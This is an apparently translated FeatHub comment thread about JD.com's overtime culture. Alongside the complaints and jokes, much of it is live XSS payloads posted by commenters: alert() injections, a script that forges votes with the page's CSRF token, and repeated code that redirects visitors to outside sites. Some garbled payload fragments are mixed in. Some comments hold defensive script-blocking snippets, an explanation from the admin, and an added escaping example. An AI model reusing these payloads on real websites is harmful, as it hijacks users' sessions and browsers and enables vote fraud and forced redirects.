LinXueyuanStdio/996.ICU

JD.com (fake pinned post: voting works normally. Disable JavaScript before viewing the comments)

LinXueyuanStdio asked for this feature 5 months ago — 87 comments

LinXueyuanStdio commented 5 months ago Admin

cshsoft commented 5 months ago

Trash second-hand JD, total rip-off.

chrisgang commented 5 months ago

641500461 commented 5 months ago

Stupid JD.

nicle-lin commented 5 months ago

Really?

liyabin1105 commented 5 months ago

With this many votes, are you still Brother Dong's brothers?

lobtao commented 5 months ago

Brother Dong's comrades-in-arms

solebeibei commented 5 months ago

Brothers

ZenYuan commented 5 months ago

Brother Dong doesn't want his brothers anymore

dblclick commented 5 months ago

For real, you little brats

Coleman-p commented 5 months ago

Honestly, small companies don't dare to post anything here; their overtime is even more brutal.

gxkyrftx commented 5 months ago

You aren't Brother Dong's brothers anymore, hhh

linyusen1995 commented 5 months ago

How is Brother Dong supposed to take this?

shanrain commented 5 months ago

Brother Dong treats you as brothers, hahaha

ziiber commented 5 months ago

Hahahaha, are you still Brother Dong's brothers or not?

JHsunshine commented 5 months ago

Brothers, don't just vote, describe your actual situation too

Simon-Leung commented 5 months ago

Serves him right for getting caught in a badger game, JD the dog

17701253801 commented 5 months ago

I bet some companies are scared shitless right now

saschapojot commented 5 months ago

Dongdongqiang is going to die miserably in the sewer with nobody caring

nimil commented 5 months ago

Brother Dong treats you as brothers, yet here you are voting

zncook commented 5 months ago

What happened to Milk Tea Sister afterwards?

RicoLiu commented 5 months ago

Brother Dong treats you as brothers

BosenY commented 5 months ago

And you're going behind Brother Dong's back like this

zhou-hai commented 5 months ago

Milk Tea is crying her eyes out in the toilet...

w460931543 commented 5 months ago

What happened

sorrymeto commented 5 months ago

996 has honestly contributed a lot to China's GDP.

mpkmapengkai commented 5 months ago

Does nobody here even recognize Brother Dong anymore?

renzhe12138 commented 5 months ago

Trash second-hand JD

multiplatformsgamer commented 5 months ago

This site just uses your GitHub account directly, and the nicknames are basically the same. How is that anonymous? And the site is too laggy.

prettychaoyao commented 5 months ago

Otherwise how could Brother Dong afford the overnight fee

sagiwei commented 5 months ago

The more detailed the salary range the better??? There sure are a lot of opportunists here

leyuxinsi commented 5 months ago

Are you all still Brother Dong's brothers or not?

y18zhou commented 5 months ago

JD doesn't have 996, does it? Looks like its culture just attracts a lot of hate.

zhaoqingzhi commented 5 months ago

gg

kanboom commented 5 months ago

666

yesjustnoname commented 5 months ago

You treat Dong as a brother; Dong treats you as a dog

carolove commented 5 months ago

Haha, the day JD got roasted the hardest

ostopuro commented 5 months ago

lc338310659 commented 5 months ago

Apart from decent electronics and the 7-day no-questions-asked return policy, I don't have a good impression of JD.

qq1057119720 commented 5 months ago

Qiangdong: I treat you as a brother, and you're here quibbling over a bit of time

gh0stkey commented 5 months ago

NinnHou commented 5 months ago

A sweatshop for programmers, huh.

redappless commented 5 months ago

Shitty JD, how many people did it screw over in autumn campus recruiting interviews (upvote if last year's autumn recruiting screwed you). Insulting offers, no pay for overtime, even worse than Huawei, cnm

zhuanggy commented 5 months ago

JD Mall front-office system: 995, overtime ranking system, no overtime allowance.

skychx commented 5 months ago

/>alert('1')

d9823 commented 5 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

intrhuting commented 5 months ago

Brother Dong: I've brought my brothers a little gift, 996. Work hard, everyone, I won't shortchange you. Alright, I'm off home to keep Milk Tea Sister company.

zx1013196355 commented 5 months ago

Hehe

zx1013196355 commented 5 months ago

I want to be a bit different

a346076818886 commented 5 months ago

alert('111111')

qingfengjiang commented 5 months ago

alert('hello');

intrhuting commented 5 months ago

US-listed internet company, headquartered in Shanghai with offices in Silicon Valley, Beijing, Shenzhen, Guangzhou and Taipei, global business, growing fast. Hiring for development, operations, product, sales, business development and design roles, generous pay, start at 10, leave a little after 6, five days a week, no 996, no ICU. For a referral, add me on WeChat: sharehealthy

jokyme commented 5 months ago

">

666sbX commented 5 months ago

jokyme, is a while loop fun? Remember one thing: your grandpa is still your grandpa

MagicGary commented 5 months ago

MagicGary commented 5 months ago

window.alert = function() { return false; }

LinXueyuanStdio commented 5 months ago Admin

table{visibility: collapse;}

LinXueyuanStdio commented 5 months ago Admin

var commentBodySet = document.getElementsByClassName("body");for(var i=0;i

leo66123 commented 5 months ago

VeHan commented 5 months ago

Are you all devils?

VeHan commented 5 months ago

Come roast this guy, he posted an infinite loop

https://github.com/leo66123/leo66123.github.io/issues/1

LinXueyuanStdio commented 5 months ago Admin

img,svg,table{visibility: collapse;}

xilibili commented 5 months ago

618 fell on the Dragon Boat Festival, and they wouldn't even let us claim overtime from 0:00 to 24:00...

reinit commented 5 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 5 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

ThomasHuang025 commented 5 months ago

const observer = new MutationObserver(mutations => {
  mutations.forEach(({ addedNodes }) => {
    addedNodes.forEach(node => {
      if (node.tagName === 'SCRIPT') {
        node.type = 'javascript/blocked'
        node.parentElement.removeChild(node)
        const beforeScriptExecuteListener = function (event) {
          event.preventDefault()
          node.removeEventListener('beforescriptexecute', beforeScriptExecuteListener)
        }
        node.addEventListener('beforescriptexecute', beforeScriptExecuteListener)
      }
    })
  })
})
observer.observe(document.documentElement, { childList: true, subtree: true })

LinXueyuanStdio commented 5 months ago Admin

I'm the admin; let me use this comment to explain.

The Mister Security Team (米斯特安全团队), which maliciously published the XSS attack method on WeChat public accounts, Zhihu and other platforms, never contacted me at all. My account linked to FeatHub clearly has an email address, but I never received a single email about the vulnerability. In other words, as soon as they found the vulnerability they disclosed it publicly, giving FeatHub no time at all to react, which violates the professional ethics an information security person ought to have.

Then there's the question of how to fix it. That's out of my hands, because FeatHub has no delete function at all. That is, you can't delete comments and you can't delete a project; apart from editing the title and opening or closing it, there's nothing. Yep, there's no way to add a README either, and no pinning (though you can fake a pin with the JD.com entry).

The XSS vulnerability can only be fixed by contacting the site operators... but I took a look and, strangely, the operators don't list any contact details... there's only a repo and a Twitter account, neither updated in a long time...

(Also, the operators are playing dead, yet with this much traffic the site still hasn't crashed; what kind of magical server is this, hahaha)

superzmy commented 5 months ago

How about a script that automatically removes script tags?

superzmy commented 5 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

zzxcvbnm19 commented 5 months ago

asdasd

zzxcvbnm19 commented 5 months ago

sadasd

zzxcvbnm19 commented 5 months ago

dasd

zzxcvbnm19 commented 5 months ago

sdasd

zzxcvbnm19 commented 5 months ago

zzxcvbnm19 commented 5 months ago

superzmy bro, the last script you posted hid everything below it

zzxcvbnm19 commented 5 months ago

Something was missing; I closed it up for you ☺
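The two comments above (superzmy's "blank any comment containing 'script'" snippet, and zzxcvbnm19's note that an unclosed script tag hid every comment below it) show why filtering a live page after the fact is a weak fix. The following is an added example, not code from this thread and not FeatHub's own code: it escapes each comment body once, at render time, so no comment text can open or close a tag, and it contrasts that with the keyword filter, which also blanks harmless comments that merely contain the word "script". The author names and comment texts are constructed samples modelled on the thread.

```javascript
// Added example, not code from the FeatHub thread or from FeatHub itself:
// escape comment bodies at render time instead of hiding them afterwards.
// Author names and comment texts below are constructed samples modelled on the thread.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every character that can change the HTML parsing context. The result is
// safe to place in HTML text content or inside a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Render one comment. The body is escaped exactly once, at output time, so no
// comment text can open a tag or close the surrounding <div>; an unbalanced
// <script> in a comment therefore cannot swallow the comments below it.
function renderComment(author, body) {
  return `<div class="body" data-author="${escapeHtml(author)}">${escapeHtml(body)}</div>`;
}

// The thread's stop-gap, modelled on superzmy's snippet: blank any comment whose
// HTML mentions "script". Works on strings here so it runs without a DOM.
function naiveStrip(htmlBody) {
  return htmlBody.indexOf("script") >= 0 ? "" : htmlBody;
}

// Constructed sample comments: one injected tag and two harmless messages that
// merely mention the word "script".
const SAMPLES = [
  { author: "commenter-a", body: '<script>alert("xss")</script>' },
  { author: "commenter-b", body: "How about a script that auto-deletes script tags?" },
  { author: "commenter-c", body: "Bro, your last script hid everything below it" },
];

// True if the string still contains something an HTML parser would read as a tag.
function containsRawTag(html) {
  return /<[a-zA-Z/]/.test(html);
}

// Compare both approaches over the samples: how many bodies the naive filter
// blanks (including the harmless ones) and whether any escaped body keeps a tag.
function compareApproaches(samples = SAMPLES) {
  const naiveBlanked = samples.filter(({ body }) => naiveStrip(body) === "").length;
  const escapedWithTag = samples.filter(({ body }) => containsRawTag(escapeHtml(body))).length;
  return { naiveBlanked, escapedWithTag };
}

// Render every sample the safe way.
function renderAll(samples = SAMPLES) {
  return samples.map(({ author, body }) => renderComment(author, body)).join("\n");
}
```

Escaping belongs on the server (or in whatever templating layer produces the comment HTML), because a client-side patch like the ones in this thread only runs after the injected markup has already been parsed. The keyword filter blanks all three samples, two of which are ordinary comments, while the escaped output keeps every comment readable and tag-free.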

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" ; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。,。。

wtf996 commented 4 months ago

window.location.href='https://www.qwq.wtf/?from=XSS';

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。
